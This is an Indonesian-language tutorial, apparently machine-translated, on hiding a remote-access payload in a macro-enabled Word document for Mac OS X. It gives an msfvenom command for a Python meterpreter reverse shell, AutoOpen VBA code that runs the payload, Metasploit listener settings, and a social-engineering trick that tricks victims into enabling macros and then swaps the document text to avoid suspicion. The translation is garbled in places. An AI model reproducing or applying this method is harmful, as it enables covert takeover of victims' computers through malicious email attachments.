Cara Tempatkan Virus Di Dokumen Word Untuk Mac OS X

Tutorial ini mengikuti ide yang sama seperti tutorial sebelumnya untuk windows, tapi sudah diperbaiki untuk bekerja dengan Mac OS X.

Berikut adalah cara Anda untuk mendapatkan sesi meterpreter dari korban untuk membuka dokumen kata berbahaya:

Langkah 1: Membuat Payload

Saya akan menggunakan payload berbasis python untuk dimasukkan dalam dokumen word. Berikut perintah untuk membuatnya: msfvenom p python / meterpreter / reverse_tcp LHOST = 127.0.0.1 LPORT = 4444> ~ / Desktop / evil.py

Seperti biasa, mengganti alamat IP setelah LHOST dengan alamat IP lokal mesin Anda. Anda dapat menemukan ini dengan mengetik ifconfig.

Langkah 2: Menambahkan Payload untuk dokumen Word

Membuka dokumen kosong dalam kata, dan menyimpannya sebagai "Macro-Enabled Document".

Selanjutnya, pergi ke Tools -> Macro -> Macro ...

Pastikan dokumen Anda dipilih dalam "Macro di:" menu dropdown pada "Semua template aktif dan dokumen" dan membuat makro baru yang disebut "AutoOpen".

Setelah mengklik "Buat", mengganti isi dari makro dengan kode VBA ini: Private Declare Function sistem Lib "libc.dylib" (ByVal perintah As String) As Long Sub AutoOpen () sistem ( "python -c" "INSERT_CONTENS_OF_YOUR_ EVIL.PY_FILE_HERE" "") end Sub

Buka file evil.py Anda yang kami buat pada langkah pertama, copy isinya, dan memasukkannya ke dalam makro. Kemudian, menyimpan dokumen.

Langkah 3: Set Up Pendengar Anda

Membuka kerangka konsol metasploit dengan mengetik msfconsole. Ketika beban, tpye menggunakan multi / handler

Sekarang, ada beberapa variabel yang perlu Anda atur: Payload, yang LHOST, dan LPORT.

Payload adalah python / meterpreter / reverse_tcp, dan LHOST dan LPORT adalah sama dengan apa yang kita digunakan pada langkah satu. Untuk memulai jenis pendengar mengeksploitasi, ketika dokumen berbahaya dibuka oleh korban, kami akan mendapatkan sesi meterpreter.

Rekayasa Sosial untuk Aktifkan Macro

Ketika dokumen kita di download dari internet (mungkin melalui email), kata microsoft memberikan peringatan kepada pengguna tentang macro.

Jika pengguna memilih untuk menonaktifkan macro, kode berbahaya kita tidak akan berjalan dan kita tidak akan mendapatkan sesi meterpreter. Untuk meyakinkan pengguna, kita harus pintar. Pertama, ketik sesuatu seperti ini ke dalam dokumen:

Sekarang, Anda dapat menambahkan perintah ini ke dalam makro AutoOpen: Dim ReplacedText As String ReplacedText = "Saya tidak menikmati lelucon komputer. Tidak sedikit pun." ActiveDocument.Range.Text = ReplacedText

Anda akan dapat menggunakan teks dalam dokumen tersebut yang seharusnya berisi seperti jadwal atau aplikasi pekerjaan. Sekarang, ketika dokumen dibuka tanpa macro diaktifkan, pengguna akan diminta untuk membukanya kembali dengan macro diaktifkan. Setelah mereka melakukannya, mereka tidak akan curiga karena isi dokumen berubah. Selamat Mencoba!